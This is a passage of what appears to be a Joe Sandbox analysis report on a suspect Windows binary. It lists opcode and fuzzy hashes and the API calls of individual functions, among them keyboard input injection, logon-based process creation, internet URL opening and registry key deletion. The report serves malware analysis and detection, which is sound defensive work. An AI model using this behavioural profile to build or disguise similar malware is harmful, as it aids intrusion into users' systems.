                                    • Opcode ID: 3d14b4556aaa8ecb1a55f0c7929b076acbc136871e02669c356cf6c11af466aa
                                    • Instruction ID: ec85391a228f088e06af1ce2223d3d85c7c51ef38b12ba9b4b2200390f8a758d
                                    • Opcode Fuzzy Hash: 3d14b4556aaa8ecb1a55f0c7929b076acbc136871e02669c356cf6c11af466aa
                                    • Instruction Fuzzy Hash: BCD0A730440712DFC7205F35FC08B0677FCAB08300B10C52DE845D2590E7B0C9C08B20
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0018ECBE,?,0018EBBB), ref: 0018ECD6
                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0018ECE8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                    • API String ID: 2574300362-1816364905
                                    • Opcode ID: 8421729fa19d8bc09186b011e4c74741234607085e47747903dbc5555b13e43e
                                    • Instruction ID: 85798f38f170aed5c7d10b69f8724a10a2d30e592632ea419566fa3d6decc9f1
                                    • Opcode Fuzzy Hash: 8421729fa19d8bc09186b011e4c74741234607085e47747903dbc5555b13e43e
                                    • Instruction Fuzzy Hash: 18D0A734900B239FCB246F65FC4860676E8AB00700B008429F845D2590EFB0C8C08B10
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0018BAD3,00000001,0018B6EE,?,001CDC00), ref: 0018BAEB
                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0018BAFD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetModuleHandleExW$kernel32.dll
                                    • API String ID: 2574300362-199464113
                                    • Opcode ID: 76e1a79e8a269e8949188c051f744c399272f4ba66995e5da458767c18854c17
                                    • Instruction ID: cdafb1ca652409c6a0711c789a2bb3a464f33d1bb3a4e817a38cc43e84cb06f5
                                    • Opcode Fuzzy Hash: 76e1a79e8a269e8949188c051f744c399272f4ba66995e5da458767c18854c17
                                    • Instruction Fuzzy Hash: B8D0A930804B229FC734AF2AFC88B5676E8AB00700B00842AE883D3690EBB0C8C1CB10
                                    APIs
                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00193BD1,?,00193E06), ref: 00193BE9
                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00193BFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                    • API String ID: 2574300362-4033151799
                                    • Opcode ID: f9bb0c050ff25b3f1e1ebc0408a0fa19ff2ba3dcea1ec8c040c2e3a48135116e
                                    • Instruction ID: a69d46f7713de498f95d57d237d0afbe4f569fc29dda8a9e6209fd6539bffd36
                                    • Opcode Fuzzy Hash: f9bb0c050ff25b3f1e1ebc0408a0fa19ff2ba3dcea1ec8c040c2e3a48135116e
                                    • Instruction Fuzzy Hash: 45D0A774400F52AFCF205F66FC08657FBF8AB06314B10442AE455E2550E7B0C4C08E10
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ab1bb0b2cf329e1d20bfe96c3ac5330a923e66e58ffb14a5e1a26cb202b158ef
                                    • Instruction ID: 2253b8297b8fa15133383d68633f6d31936927616a397950bbbc8c5e5a625b3f
                                    • Opcode Fuzzy Hash: ab1bb0b2cf329e1d20bfe96c3ac5330a923e66e58ffb14a5e1a26cb202b158ef
                                    • Instruction Fuzzy Hash: 05C15B75A0021AEFCB18CFA4CC84AAEB7B9FF48704F118598E905EB251D731EE51DB90
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 0018AAB4
                                    • CoUninitialize.COMBASE ref: 0018AABF
                                      • Part of subcall function 00170213: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 0017027B
                                    • VariantInit.OLEAUT32(?), ref: 0018AACA
                                    • VariantClear.OLEAUT32(?), ref: 0018AD9D
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                    • String ID:
                                    • API String ID: 780911581-0
                                    • Opcode ID: 30654616a92ffe6542801691e82a8350c8f0ef69d55c3ad67a4123a333f74a66
                                    • Instruction ID: 07808f0d5219f7315fbc80c2b197e5ca6b5f7948a6bb1ef6c2dc2b971bdcb8a0
                                    • Opcode Fuzzy Hash: 30654616a92ffe6542801691e82a8350c8f0ef69d55c3ad67a4123a333f74a66
                                    • Instruction Fuzzy Hash: 7EA16B752047019FDB14EF64C481B1AB7E5BF98720F448549F99A9B3A2CB70EE44CF86
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Variant$AllocClearCopyInitString
                                    • String ID:
                                    • API String ID: 2808897238-0
                                    • Opcode ID: 6fc140092633ec1ff231b2ba17de79d90e2a57251136d6ef901ecb0ea334033a
                                    • Instruction ID: 35be758b9b235c599be24225279d7602033d88fc7430f5c13265c9c7fe54d5f4
                                    • Opcode Fuzzy Hash: 6fc140092633ec1ff231b2ba17de79d90e2a57251136d6ef901ecb0ea334033a
                                    • Instruction Fuzzy Hash: 26518134A043069BDB249F79DC95A2EB3EDBF54310F20881FE586CB3E1DB7498908705
                                    APIs
                                    • GetWindowRect.USER32(01755BD0,?), ref: 0019C544
                                    • ScreenToClient.USER32(?,00000002), ref: 0019C574
                                    • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0019C5DA
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$ClientMoveRectScreen
                                    • String ID:
                                    • API String ID: 3880355969-0
                                    • Opcode ID: f9dae246b2f1a8e662bf61ad44a3241c4857998a485b757a12f12442c0a9d575
                                    • Instruction ID: e84ffcde6eddc839244c1186533f934e50d10c7dd009c7676997ec2840657dd2
                                    • Opcode Fuzzy Hash: f9dae246b2f1a8e662bf61ad44a3241c4857998a485b757a12f12442c0a9d575
                                    • Instruction Fuzzy Hash: D1515D75A00205EFDF10DF68D880AAE7BB6EB55320F118259F9A5DB290D770ED81CB90
                                    APIs
                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0016C462
                                    • __itow.LIBCMT ref: 0016C49C
                                      • Part of subcall function 0016C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0016C753
                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0016C505
                                    • __itow.LIBCMT ref: 0016C55A
                                    Similarity
                                    • API ID: MessageSend$__itow
                                    • String ID:
                                    • API String ID: 3379773720-0
                                    • Opcode ID: 93a02231bf0802e77d1c0561e906b38939163fe3a0f7f3f75f4ab77e6f7afdc6
                                    • Instruction ID: c6c8e1ec643db285c712aedec38d3b0a8527c14f87a4969153fd2b90104bf3b6
                                    • Opcode Fuzzy Hash: 93a02231bf0802e77d1c0561e906b38939163fe3a0f7f3f75f4ab77e6f7afdc6
                                    • Instruction Fuzzy Hash: 2741A371A00608AFDF25EF54CC56BFE7BB9AF59700F000029FA46A7291DB709A55CBE1
                                    APIs
                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00173966
                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00173982
                                    • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 001739EF
                                    • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00173A4D
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    • Opcode ID: 18bed05b84de8ca1ee88dc8a2bc0e840ce484de1db4f0f77fc5fc17832d777fb
                                    • Instruction ID: 4450edc7663c539c2f946c8d60523684aedcf7302f37335bb75107aea41301e8
                                    • Opcode Fuzzy Hash: 18bed05b84de8ca1ee88dc8a2bc0e840ce484de1db4f0f77fc5fc17832d777fb
                                    • Instruction Fuzzy Hash: 2C415B70E04218AEEF348B64C80ABFDBBB59B55314F04811AF6E9932C1C7B58EC5E761
                                    APIs
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0019B5D1
                                    Similarity
                                    • API ID: InvalidateRect
                                    • String ID:
                                    • API String ID: 634782764-0
                                    • Opcode ID: cfa8739777b9c86f20b3757276ec08fd90c939cd19200484209bd7a31d7fb1e1
                                    • Instruction ID: 8a287d223d4b54326394ae753c3362c19780a6acaa7b994af322c3bd7825f1c8
                                    • Opcode Fuzzy Hash: cfa8739777b9c86f20b3757276ec08fd90c939cd19200484209bd7a31d7fb1e1
                                    • Instruction Fuzzy Hash: 8031CE74609208FFEF289F18FEC9FA87765AB06320F664211FA51D66E1D770B980CB51
                                    APIs
                                    • ClientToScreen.USER32(?,?), ref: 0019D807
                                    • GetWindowRect.USER32(?,?), ref: 0019D87D
                                    • PtInRect.USER32(?,?,0019ED5A), ref: 0019D88D
                                    • MessageBeep.USER32(00000000), ref: 0019D8FE
                                    Similarity
                                    • API ID: Rect$BeepClientMessageScreenWindow
                                    • String ID:
                                    • API String ID: 1352109105-0
                                    • Opcode ID: 69af84fd9f3cb5235455a22f0781d5333b074dabe367fb6e2fb6dc298bb387c4
                                    • Instruction ID: f8e8a4776375db8d609ae2250a7492fa0e54ee3f46bc0d5e7ab6533d96212dbf
                                    • Opcode Fuzzy Hash: 69af84fd9f3cb5235455a22f0781d5333b074dabe367fb6e2fb6dc298bb387c4
                                    • Instruction Fuzzy Hash: E841AE74A00219EFCF15DF69E884BA97BF5FF49324F1981A9E915DB262D330E981CB40
                                    APIs
                                    • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00173AB8
                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00173AD4
                                    • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00173B34
                                    • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00173B92
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    • Opcode ID: c2c94e850c1f373058e2c6e53db71070b97f9688d1d238edcf63d8edfa68f91b
                                    • Instruction ID: be39228982ea8a994274205a1e34b4d9b4fe42f3785da336b37e9a8999767048
                                    • Opcode Fuzzy Hash: c2c94e850c1f373058e2c6e53db71070b97f9688d1d238edcf63d8edfa68f91b
                                    • Instruction Fuzzy Hash: F7315B70A00258AEEF358B64CC19BFE7BB59B55310F04825AE8DD932D1C7748F86E761
                                    APIs
                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00164038
                                    • __isleadbyte_l.LIBCMT ref: 00164066
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00164094
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 001640CA
                                    Similarity
                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                    • String ID:
                                    • API String ID: 3058430110-0
                                    • Opcode ID: f108283a243898b9c6181240ea92fe572511078df7961eb812305452a58e0274
                                    • Instruction ID: 2397fd8b74c9955a77ebcf6eacfd7ccc4e1b6cd220b650d67fde65c249c3b20e
                                    • Opcode Fuzzy Hash: f108283a243898b9c6181240ea92fe572511078df7961eb812305452a58e0274
                                    • Instruction Fuzzy Hash: 6031BC31600226EFDB269F74CC45BFB7BA5BF41310F168529FA658B1A1E731D8A0DB90
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00184358
                                      • Part of subcall function 001843E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00184401
                                      • Part of subcall function 001843E2: InternetCloseHandle.WININET(00000000), ref: 0018449E
                                    Similarity
                                    • API ID: Internet$CloseConnectHandleOpen
                                    • String ID:
                                    • API String ID: 1463438336-0
                                    • Opcode ID: 53f8bbf5efda47781187a1370de3b8cbd2865a9cbe54bf4969919b13b8b9eec4
                                    • Instruction ID: e9759464f4e078d1b973818403d2f8e0faf4a0c2d51a5f37798f09f258c07609
                                    • Opcode Fuzzy Hash: 53f8bbf5efda47781187a1370de3b8cbd2865a9cbe54bf4969919b13b8b9eec4
                                    • Instruction Fuzzy Hash: C8210131200612BBEB19AF609C00FBBB7A9FF54704F00411ABA4596A50DF719A209FA0
                                    APIs
                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0016AFAE
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0016AFB5
                                    • CloseHandle.KERNEL32(00000004), ref: 0016AFCF
                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0016AFFE
                                    Similarity
                                    • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                    • String ID:
                                    • API String ID: 2621361867-0
                                    • Opcode ID: 608065b19e1373c8233b4dc3d9b4bcb3a12dc35cfbec0f5e7ca794d3f50a355b
                                    • Instruction ID: 127e68b4720014541bc04f10e35ff97b00ed5557bf70ae3451725968e083e3f2
                                    • Opcode Fuzzy Hash: 608065b19e1373c8233b4dc3d9b4bcb3a12dc35cfbec0f5e7ca794d3f50a355b
                                    • Instruction Fuzzy Hash: F12149B2104209ABDB069FA4ED49BEE7BA9AF44304F044165FA01A2161D376DD61EB62
                                    APIs
                                    • GetWindowLongW.USER32(?,000000EC), ref: 00198AA6
                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00198AC0
                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00198ACE
                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00198ADC
                                    Similarity
                                    • API ID: Window$Long$AttributesLayered
                                    • String ID:
                                    • API String ID: 2169480361-0
                                    • Opcode ID: ec44b83a4a88ad5ce21647808dc3d831a0e1a060a56aee60df934fda54d89216
                                    • Instruction ID: 0a6e39f837937381496b523ccd0d7d5d489f3d1cf0bde5b38b063800d1dc5bad
                                    • Opcode Fuzzy Hash: ec44b83a4a88ad5ce21647808dc3d831a0e1a060a56aee60df934fda54d89216
                                    • Instruction Fuzzy Hash: C411B231305115AFDB08AB18DC45FBA77A9FF96320F144219F91AC72E2DB74BD408B94
                                    APIs
                                    • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00188AE0
                                    • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00188AF2
                                    • accept.WS2_32(00000000,00000000,00000000), ref: 00188AFF
                                    • WSAGetLastError.WS2_32(00000000), ref: 00188B16
                                    Similarity
                                    • API ID: ErrorLastacceptselect
                                    • String ID:
                                    • API String ID: 385091864-0
                                    • Opcode ID: b74004bb266c72d4565cf2ae8ff5a3b2fefcb0faaef9de6d6d89823dcaed8c40
                                    • Instruction ID: a1c54649de61ac56ec0d87d787497061762a9c3fe13f527118773d2aaa9b54cc
                                    • Opcode Fuzzy Hash: b74004bb266c72d4565cf2ae8ff5a3b2fefcb0faaef9de6d6d89823dcaed8c40
                                    • Instruction Fuzzy Hash: 6E21A872A001249FC7159F68DC85ADEBBFCEF5A314F004169F849D7250DB74DA818F90
                                    APIs
                                      • Part of subcall function 00171E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00170ABB,?,?,?,0017187A,00000000,000000EF,00000119,?,?), ref: 00171E77
                                      • Part of subcall function 00171E68: lstrcpyW.KERNEL32(00000000,?,?,00170ABB,?,?,?,0017187A,00000000,000000EF,00000119,?,?,00000000), ref: 00171E9D
                                      • Part of subcall function 00171E68: lstrcmpiW.KERNEL32(00000000,?,00170ABB,?,?,?,0017187A,00000000,000000EF,00000119,?,?), ref: 00171ECE
                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0017187A,00000000,000000EF,00000119,?,?,00000000), ref: 00170AD4
                                    • lstrcpyW.KERNEL32(00000000,?,?,0017187A,00000000,000000EF,00000119,?,?,00000000), ref: 00170AFA
                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,0017187A,00000000,000000EF,00000119,?,?,00000000), ref: 00170B2E
                                    Strings
                                    Similarity
                                    • API ID: lstrcmpilstrcpylstrlen
                                    • String ID: cdecl
                                    • API String ID: 4031866154-3896280584
                                    • Opcode ID: fd42b6d11d02356f4a19d2874ade7754bd6f1f21f81b9e8a99a9b199996aff20
                                    • Instruction ID: 2c0467e80c7bc66afa581c9f82bcf42549ca26712b5c028cb1161aec56338d27
                                    • Opcode Fuzzy Hash: fd42b6d11d02356f4a19d2874ade7754bd6f1f21f81b9e8a99a9b199996aff20
                                    • Instruction Fuzzy Hash: D211963A100305EFDB269F34DC45D7A77B8FF49354B90816AE809CB260EB719951C7A1
                                    APIs
                                    • _free.LIBCMT ref: 00162FB5
                                      • Part of subcall function 0015395C: __FF_MSGBANNER.LIBCMT ref: 00153973
                                      • Part of subcall function 0015395C: __NMSG_WRITE.LIBCMT ref: 0015397A
                                      • Part of subcall function 0015395C: RtlAllocateHeap.NTDLL(01730000,00000000,00000001), ref: 0015399F
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: 35188b0a476950d89a7b98b28d2a72101c8524b169477a5589e340c7f4c511dc
                                    • Instruction ID: 77edb87b8ad81d02a348661eeec8bba99dc7134c2d552a8a47bc5d1dfd627711
                                    • Opcode Fuzzy Hash: 35188b0a476950d89a7b98b28d2a72101c8524b169477a5589e340c7f4c511dc
                                    • Instruction Fuzzy Hash: 4F110A31509612EBDB363B70BC0566E3BA8BF24361F204525FC699E192DB30CD94C690
                                    APIs
                                    • _memset.LIBCMT ref: 0014EBB2
                                      • Part of subcall function 001351AF: _memset.LIBCMT ref: 0013522F
                                      • Part of subcall function 001351AF: _wcscpy.LIBCMT ref: 00135283
                                      • Part of subcall function 001351AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00135293
                                    • KillTimer.USER32(?,00000001,?,?), ref: 0014EC07
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0014EC16
                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001A3C88
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                    • String ID:
                                    • API String ID: 1378193009-0
                                    • Opcode ID: 4e30c8ee4e867047ad585c569df6241f8a095c7f69eb59d0502b29e0f95135f1
                                    • Instruction ID: ebf21d5a04941660ca0ba15f41c547ebc93f4e12e1a4a300403a24d441134b78
                                    • Opcode Fuzzy Hash: 4e30c8ee4e867047ad585c569df6241f8a095c7f69eb59d0502b29e0f95135f1
                                    • Instruction Fuzzy Hash: AF212974904784AFE7379B28CC59BE7BFECAB06318F04048EF69E56241C7742A84CB51
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 001705AC
                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 001705C7
                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 001705DD
                                    • FreeLibrary.KERNEL32(?), ref: 00170632
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                    • String ID:
                                    • API String ID: 3137044355-0
                                    • Opcode ID: 2907ed8a4d23fc38a2080d5ab48d4b6c9519c85b11a685df815dc1a8d7ad1a79
                                    • Instruction ID: ce5d6e0e4b38082b78e3fa69b8ef63a3d480aeccf6f73af7a30a76bb4dcd87dc
                                    • Opcode Fuzzy Hash: 2907ed8a4d23fc38a2080d5ab48d4b6c9519c85b11a685df815dc1a8d7ad1a79
                                    • Instruction Fuzzy Hash: 54218E71900309EFDB269F95EC98ADABBB8EF48700F00C56DF51A92450E770EA55DF60
                                    APIs
                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00176733
                                    • _memset.LIBCMT ref: 00176754
                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 001767A6
                                    • CloseHandle.KERNEL32(00000000), ref: 001767AF
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                    • String ID:
                                    • API String ID: 1157408455-0
